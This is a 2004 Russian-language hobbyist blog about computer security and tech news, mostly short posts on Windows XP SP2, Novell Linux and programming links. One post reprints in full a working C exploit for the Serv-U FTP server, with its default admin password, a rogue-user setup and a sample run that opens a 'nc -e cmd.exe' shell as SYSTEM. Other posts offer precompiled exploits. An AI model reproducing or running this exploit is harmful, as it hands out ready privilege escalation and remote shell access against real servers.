eXpLse7C...
клуб заведен 08-08-2004
постоянные читатели [9]
Eagles, Extreme club, K.F, kitana, p1i-X-ed, w02f, Букля_, ПАРАД УРОДОВ, Скромняга-2
закладки:
цитатник:
клуб:
интересы [21]
антиресы [12]
[19] 21-11-2005 13:18
Site

[Print]
Забрел случайно
[2] 10-08-2004 10:25
О...

[Print]
n00b_ki11er
Суббота, 18 Сентября 2004 г.
21:32 n00b_ki11er » really sorry
Прошу прощения, на постинг тут времени не остается. Да и не понятно пока, нужно ли это кому. Если нужно, плз. отпишитесь, что бы я знал.


---------------------------------------------------------
Теперь немного о сайте. Хостера я нашел. Цена классная - 150р. включает в себя все услуги (PHP, mySQL, FTP, Perl, C++). Хех Теперь надо думать с дизаином и названием.

Current music: Oomph! - Ego
Состояние: заторможенное
Четверг, 26 Августа 2004 г.
00:09 n00b_ki11er » Вот еще ссылки
Суббота, 21 Августа 2004 г.
23:42 n00b_ki11er » Права
Читаем права вирьмейкеров тут
12:18 n00b_ki11er » Новости
Четверг, 19 Августа 2004 г.
01:37 n00b_ki11er » Site
Вообщем, клуб это конечно круто, но!. Я давно мечтаю сделать сайт о компах. Всем. Железе, ПО и пр. однако понятно я один не смогу держать столько разделов. Мне нужно пару человек в помощь. дизайнер есть, хостинг буду оплачивать я. Если кому эта идея интересна - пишите в комменты.

Состояние: креативное
Среда, 18 Августа 2004 г.
22:54 n00b_ki11er » Наш бывший
Вот резюме бывшего админа нашей локалки (он уволился)...Пипец у чувака знаний...тока вот хамил юзерам много...
Вторник, 17 Августа 2004 г.
16:34 n00b_ki11er » Win XP SP2
Маразм крепчал...:

Компания Microsoft опубликовала новую информацию, касающуюся второго сервис-пака к операционной системе Windows XP. В очередной статье базы знаний Microsoft рассказывается, что делать c программами, которые перестают нормально работать после установки пакета обновлений. В Microsoft отмечают, что большинство проблем возникают из-за блокировки брандмауэром сетевых соединений. В результате, некоторые функции приложений оказываются недоступными, сообщает Компьюлента.

В большинстве случаев, для того чтобы приложение могло обмениваться данными по сети, достаточно разрешить ему это, выбрав опцию Unblock в диалоговом окне брандмауэра, которое появляется при попытке "незнакомой" программы выйти в интернет. Например, для интернет-пейджера Miranda этого оказалось вполне достаточно. К альтернативными браузерам Opera и Mozilla у сервис-пака претензий вообще нет.

Однако в некоторых случаях автоматическая настройка не помогает, и необходимо вручную открывать необходимые для работы приложения порты. При этом возможны кое-какие затруднения, и Microsoft рассказывает, как их разрешить. Самое сложное - выяснить, какой диапазон портов используется программой. Затем нужно войти в пункт настройки брандмауэра и указать эти порты в качестве разрешенных. Перечень программ, порты для которых необходимо открывать, достаточно обширен. В него входят, например, FTP-клиент CuteFTP 5.0, среда разработки Visual Studio .NET (дополнительные настройки требуются при использовании удаленной отладки), Symantec AntiVirus Corporate Edition 8.0 и 9.0 и многие другие программы, в том числе некоторые игры, включая Need for Speed Hot Pursuit 2 и Unreal Tournament 2003.


И кто будет юзать их фаер? Имхо два самых офигенных фаера - PC-ciling 2002 и Agnitum Outpost 2.1 с плугами.

отредактировано: 17-08-2004 16:35 - n00b_ki11er

16:30 n00b_ki11er » Xakep Spec.
Купил вот Хакер Спец. Ож очень интересный. Весь журнал посвящен сплоитам! Интервью там разные с известными секурити-спецами наше страны, софт неплохой.
Среда, 11 Августа 2004 г.
01:08 n00b_ki11er » eXploits FAQ
Это не ФАК конечно, а так....Постольку-поскольку меня уже спрашивали, что за хрень - сплоит, опишу как я ее тут.
Читать дальше

отредактировано: 11-08-2004 10:34 - n00b_ki11er

Так:
1)Игры под Linux своими /dev/hands feat. /dev/brain
2)Пишем ось
3)CGI security

Ссылка 1) - я так понял интересно будет
Ссылка 2) - принципы и советы по написанию своей оси
Ссылка 3) - о CGI

отредактировано: 11-08-2004 00:31 - n00b_ki11er

Вторник, 10 Августа 2004 г.
12:34 n00b_ki11er » Еще новость
Novell выпустит новую версию Linux уже осенью
Novell планирует выпустить новую корпоративную версию Linux для настольных компьютеров этой осенью, объединив в ней технологии от двух купленных Linux-компаний, сообщает nixp.ru.
В этом году Novell приобрела SuSE Linux, а еще в 2003 — Ximian, но компания так и не успела собрать в единое целое оба продукта. Времена меняются, что и было продемонстрировано на LinuxWorld Conference & Expo.

Показанный на выставке прототип получил название Novell Linux Desktop, но Bruce Lowry заметил, что это еще, возможно, не окончательное имя.

Основой для операционной системы служит SuSE Linux Desktop, идущий с аттестатами программ от SuSE Linux Enterprise Server. В продукт войдет Ximian Desktop, графический интерфейс и набор ПО, настроенного для работы с GroupWise, серверным ПО от Novell для электронной почты, расписания, списков контактов и обмена сообщениями.
Понедельник, 9 Августа 2004 г.
00:23 n00b_ki11er » lccwin32.exe
Именно этим компилятором я советую билдить проекты. Скачать можно тут
А так же два скомпиленых сплоита:
lsasrvsploit
ServUsploit
Воскресенье, 8 Августа 2004 г.
23:16 n00b_ki11er » Эксплоит для Serv-U
/*
* Hax0rcitos proudly presents
* Serv-u Local Exploit >v3.x. (tested also against last version 5.1.0.0)
*
* All Serv-u Versions have default Login/password for local Administration.
* This account is only available to connect in the loopback interface, so a
* local user will be able to connect to Serv-u with this account and create
* an ftp user with execute rights. after the user is created, just connect
* to the ftp server and execute a raw "SITE EXEC" command. the program will
* be execute with SYSTEM privileges.
*
* Copyright (c) 2003-2004 Haxorcitos com . All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*
* Date: 10/2003
* Author: Andrйs Tarascу Acunha
*
* Greetings to: #haxorcitos - #localhost and #!dsr blackxors =)
*
* Tested Against Serv-u 4.x and v5.1.0.0

G:\exploit\serv-U\local>whoami
INSANE\aT4r

G:\exploit\serv-U\local>servulocal.exe "nc -l -p 99 -e cmd.exe"
Serv-u >3.x Local Exploit by Haxorcitos

<220 Serv-U FTP Server v5.0 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
******************************************************
>SITE MAINTENANCE
******************************************************
[+] Creating New Domain...
<200-DomainID=3
220 Domain settings saved
******************************************************
[+] Domain Haxorcitos:3 Created
[+] Setting New Domain Online
<220 Server command OK
******************************************************
[+] Creating Evil User
<200-User=haxorcitos
200 User settings saved
******************************************************
[+] Now Exploiting...
>USER haxorcitos
<331 User name okay, need password.
******************************************************
>PASS whitex0r
<230 User logged in, proceed.
******************************************************
[+] Now Executing: nc -l -p 99 -e cmd.exe
<220 Domain deleted
******************************************************
G:\exploit\serv-U\local>nc localhost 99
Microsoft Windows XP [Versiуn 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>whoami
whoami
NT AUTHORITY\SYSTEM
C:\>
*/

#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <io.h>
#include <process.h>

//Responses
#define BANNER "220 "
#define USEROK "331 User name okay"
#define PASSOK "230 User logged in, proceed."
#define ADMOK "230-Switching to SYSTEM MAINTENANCE mode."
#define DOMAINID "200-DomainID="
//Commands

#define XPLUSER "USER haxorcitos\r\n"
#define XPLPASSWORD "PASS whitex0r\r\n"
#define USER "USER LocalAdministrator\r\n"
#define PASSWORD "PASS #l@$ak#.lk;0@P\r\n"

#define MAINTENANCE "SITE MAINTENANCE\r\n"
#define EXIT "QUIT\r\n"
char newdomain[]="-SETDOMAIN\r\n"
"-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n"
"-TZOEnable=0\r\n"
" TZOKey=\r\n";
/* "-DynDNSEnable=0\r\n"
" DynIPName=\r\n";
*/
char deldomain[]="-DELETEDOMAIN\r\n"
"-IP=0.0.0.0\r\n"
" PortNo=2121\r\n";

char newuser[] =
"-SETUSERSETUP\r\n"
"-IP=0.0.0.0\r\n"
"-PortNo=2121\r\n"
"-User=haxorcitos\r\n"
"-Password=whitex0r\r\n"
"-HomeDir=c:\\\r\n"
"-LoginMesFile=\r\n"
"-Disable=0\r\n"
"-RelPaths=1\r\n"
"-NeedSecure=0\r\n"
"-HideHidden=0\r\n"
"-AlwaysAllowLogin=0\r\n"
"-ChangePassword=0\r\n"
"-QuotaEnable=0\r\n"
"-MaxUsersLoginPerIP=-1\r\n"
"-SpeedLimitUp=0\r\n"
"-SpeedLimitDown=0\r\n"
"-MaxNrUsers=-1\r\n"
"-IdleTimeOut=600\r\n"
"-SessionTimeOut=-1\r\n"
"-Expire=0\r\n"
"-RatioUp=1\r\n"
"-RatioDown=1\r\n"
"-RatiosCredit=0\r\n"
"-QuotaCurrent=0\r\n"
"-QuotaMaximum=0\r\n"
"-Maintenance=None\r\n"
"-PasswordType=Regular\r\n"
"-Ratios=None\r\n"
" Access=c:\\|RELP\r\n";

#define localport 43958
#define localip "127.0.0.1"

char cadena[1024];
int rec,domain;
/******************************************************************************/

void ParseCommands(int sock, char *data, int ShowSend, int showResponses,
char *response) {
send(sock,data,strlen(data),0);
if (ShowSend) printf(">%s",data);
Sleep(100);
do {
rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='\0';
if (rec<=0) return;
if (showResponses) printf("<%s",cadena);
if (strncmp(cadena, DOMAINID,strlen(DOMAINID))==0)
domain=atoi(cadena+strlen(DOMAINID));
//} while (strncmp(cadena,response,strlen(response))!=0);
} while (strstr(cadena,response)==NULL);
printf("******************************************************\r\n");
}
/******************************************************************************/
int main(int argc, char* argv[])
{
WSADATA ws;
int sock,sock2;

struct sockaddr_in haxorcitos;
struct sockaddr_in xpl;

printf("Serv-u >3.x Local Exploit by Haxorcitos\r\n\r\n");
if (argc<2) {
printf("USAGE: ServuLocal.exe \"command\"\r\n");
printf("Example: ServuLocal.exe \"nc.exe -l -p 99 -e cmd.exe\"");
return(0);
}

if (WSAStartup( MAKEWORD(2,2), &ws )!=0) {
printf(" [-] WSAStartup() error\n");
exit(0);
}

haxorcitos.sin_family = AF_INET;
haxorcitos.sin_port = htons(localport);
haxorcitos.sin_addr.s_addr = inet_addr(localip);
sock=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
connect(sock,( struct sockaddr *)&haxorcitos,sizeof(haxorcitos));
rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='\0';
printf("<%s",cadena);

ParseCommands(sock,USER,1,1,USEROK);
ParseCommands(sock,PASSWORD,1,1,PASSOK);
ParseCommands(sock,MAINTENANCE,1,0,"230 ");

printf("[+] Creating New Domain...\r\n");
ParseCommands(sock,newdomain,0,1,BANNER);
printf("[+] Domain Haxorcitos:%i Created\n",domain);

/* Only for v5.x
printf("[+] Setting New Domain Online\r\n");
sprintf(cadena,"-SERVERCOMMAND\r\n-ID=%i\r\n
Command=DomainOnline\r\n",domain);
ParseCommands(sock,cadena,0,1,BANNER);
*/
printf("[+] Creating Evil User\r\n");
ParseCommands(sock,newuser,0,1,"200 ");
Sleep(1000);

printf("[+] Now Exploiting...\r\n");
xpl.sin_family = AF_INET;
xpl.sin_port = htons(2121);
xpl.sin_addr.s_addr = inet_addr(localip);
sock2=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
connect(sock2,( struct sockaddr *)&xpl,sizeof(xpl));
rec=recv(sock2,cadena,sizeof(cadena),0); cadena[rec]='\0';
ParseCommands(sock2,XPLUSER,1,1,USEROK);
ParseCommands(sock2,XPLPASSWORD,1,1,PASSOK);
printf("[+] Now Executing: %s\r\n",argv[1]);
sprintf(cadena,"site exec %s\r\n",argv[1]);
send(sock2,cadena,strlen(cadena),0);
shutdown(sock2,SD_BOTH);
Sleep(100);
ParseCommands(sock,deldomain,0,1,BANNER);
send(sock,EXIT,strlen(EXIT),0);
shutdown(sock,SD_BOTH);
closesocket(sock);
closesocket(sock2);

return 0;
}


----------------------------------------------------------------------------
На самом деле, можно даже не знать С, что бы понять, что этот сплоит творит...Дырки, дырки и еще раз дырки в Микрософте...
Да, кстати, если лень компилить, могу выкладывать так же ссылки на уже собранные сплоиты.

отредактировано: 09-08-2004 00:17 - n00b_ki11er

22:57 n00b_ki11er » Euphoria
Совсем недавно я откопал ресурс, посвященный новуму языку программирования Euphoria (Эйфория).
Ловим ссылку.

отредактировано: 09-08-2004 10:35 - n00b_ki11er

22:48 n00b_ki11er » О...
Вообщем тут будут новости о комрьютерной безопасности, новом железе (этого меньше), обсуждение кодов и пр. пр. пр. Надеюсь компьютерщикам этот дневник покажеться интересным.
Закрыть